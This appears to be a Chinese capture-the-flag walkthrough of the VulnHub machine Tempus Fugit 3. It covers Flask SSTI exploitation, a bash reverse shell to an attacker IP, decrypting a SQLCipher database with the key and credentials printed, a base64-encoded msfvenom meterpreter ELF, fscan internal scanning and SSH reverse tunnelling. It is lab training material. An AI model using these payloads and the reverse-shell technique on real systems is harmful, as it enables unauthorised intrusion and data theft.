当前位置: 首页 > news >正文

从SSTI模板注入到docker容器内网渗透:靶机练习之Tempus_fugit3

靶机提示

sstisqlite文件破解内网渗透容器

靶机下载

https://download.vulnhub.com/tempusfugit/Tempus-Fugit-3.ova

信息搜集

nmap -sT --min-rate 10000 -p- 192.168.8.250

很简单的信息,只有一个web页面

SSTI模板注入漏洞

无意中发现404似乎都是有个统一的拦截页面

{{2*2}}}

直接注入payload,果然存在ssti漏洞

先查看配置,定位服务端模板版本

{{config}}

根据特征推断服务端是flask

同时base64解码拿到第一个flag

flask ssti注入payload

{{ request.application.__globals__.__builtins__.__import__('os').popen('id').read() }}

成功回显

反弹shell

{{ request.application.__globals__.__builtins__.__import__('os').popen('bash -c "/bin/bash -i >& /dev/tcp/192.168.8.251/4444 0>&1"').read() }}

sqlite 数据窃取

app.py文件中发现了第一个flag,以及数据库密码,

pragma key='SecretssecretsSecrets...'

并且用的时sqlite数据库
SQLite 是一个嵌入式的、进程内(in-process)、无服务器、零配置、事务性的 SQL 数据库引擎,它只在本地生成一个文件

顺着app.py源码指示的路径也发现了db文件

sqlite交互

登录

sqlcipher db2.db --interactive

输入密码

PRAGMA key = 'SecretssecretsSecrets...';

hugh-janus|S0secretPassW0rd anita-hanjaab|ssdf%dg5xc clee-torres|asRtesa#2s RmxhZzN7IEhleSwgcmVhZGluZyBzZWNyZXRzICB9|

拿到第三个flag

后台源码泄露


源码里面拿到flag2


提权

想进一步利用时发现,反弹shell是受限的

推断可能是容器shell

拿到shell后无法执行查看网络的命令,同时也没有curl/wget等命令,再联想到端口服务探测时,发现80端口只是nginx服务,猜测可能是docker容器

摆脱受限容器

生成一个不依赖任何运行时(curl/wget/python)的纯二进制后门

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.8.251 LPORT=6666 -f elf -o ex.elf

将 ELF 二进制转为 Base64 文本传输
-w0禁止换行

cat ex.elf| base64 -w0

在靶机生成payload

echo 'f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAABAAAAAAAAAAEAAAAHAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAA+gAAAAAAAAB8AQAAAAAAAAAQAAAAAAAAMf9qCViZthBIidZNMclqIkFaagdaDwVIhcB4UWoKQVlQailYmWoCX2oBXg8FSIXAeDtIl0i5AgAaCsCoCPtRSInmahBaaipYDwVZSIXAeSVJ/8l0GFdqI1hqAGoFSInnSDH2DwVZWV9IhcB5x2o8WGoBXw8FXmp+Wg8FSIXAeO3/5g==' |base64 -d > ex.elf

msf启动监听

拿到meterpreter shell

内网渗透

先拿到内网ip

上传fscan

meterpreter > upload /root/tools/fscan

进入shell

fscan -h 192.168.100.0/24

发现了192.168.100.1

端口扫描

./fscan -h 192.168.100.0/24 -p 1-65535 -t 50

开了34193端口和80端口

端口转发

把内网端口通过ssh隧道转发到kali

ssh -N -R 5555:192.168.100.1:80 root@192.168.8.251

ps靶机环境似乎有问题,卡在这边整了很久,看了一下wp内网的192.168.100.1机器的还有个443端口,但是靶机的443似乎没有启动起来,暂时先这样。

http://www.jsqmd.com/news/1139628/

相关文章:

  • Windows系统下Xray被动扫描环境配置全攻略:从证书安装到代理设置
  • 狼人杀不只是游戏:9 个大模型的多轮博弈能力观察
  • 2026年东莞良心4s店哪家服务好:最新权威排名与专业指南。
  • 洛雪音乐音源完全指南:如何免费获取全网无损音乐资源
  • 如何快速掌握res-downloader:全网视频音频资源下载的终极指南
  • Snipe-IT新手部署全路径指南:XAMPP/Ubuntu/Docker三路实操
  • 基于行车记录仪与AI的道路病害自动检测技术实践
  • 从“人工智障”到“智能管家”:手把手教你重构一个R语言AI智能体
  • WindowResizer:Windows窗口调整终极解决方案,告别无法调整大小的顽固窗口
  • PCB孔金属化工艺:从化学镀铜到直接电镀的2种方案与15μm厚度控制
  • Fortify路径遍历漏洞深度解析:从输入验证到数据流防护的完整方案
  • 3个月成为专业前端开发者:freeCodeCamp前端开发库认证完全指南
  • edge浏览器图片助手(ImageAssistant) 批量图片下载器扩展一款用于嗅探、分析网页图片并提供批量下载等功能的浏览器扩展程序
  • (十五)「JVS-Rules规则引擎 V2.5」— 赋值节点
  • Ideogram4开源图像生成模型:从环境搭建到区域编辑的完整实践指南
  • 3步掌握WebODM:免费开源的无人机图像处理终极指南
  • 剪流 GEO 完整操作流程拆解:资深运营手把手教你从 0 到 1 做优化
  • Paperxie 期刊论文写作|科研人投稿避坑指南,普刊 / 北核 / SCI 一键分档创作
  • YOLO目标检测从零实战:Ultralytics Platform简化训练与部署全流程
  • OpenCV视频处理:从采集到保存的完整实践指南
  • 管廊照明智能控制要用哪些设备?四层架构+选型要点解析
  • 线上PMP培训靠谱吗?通过率有保障吗?
  • 跨境电商售后客服工单怎么实现自动分流处理?基于AI Agent的端到端智能自动化实战指南
  • 光明新零售系统:全渠道零售方案
  • 如何用Bilibili-Old恢复经典B站体验:告别新版困扰的完整解决方案
  • PvZ Tools终极指南:5分钟掌握植物大战僵尸完整修改技巧
  • YOLO目标检测实战:从数据标注到模型部署全流程指南
  • AI智能体自动化解决VC++运行库缺失:从检测到决策的工程实践
  • LTX2.3+ComfyUI本地图生视频部署指南:12G显存即可运行
  • 5分钟快速上手Foliate:Linux上最优雅的电子书阅读器终极指南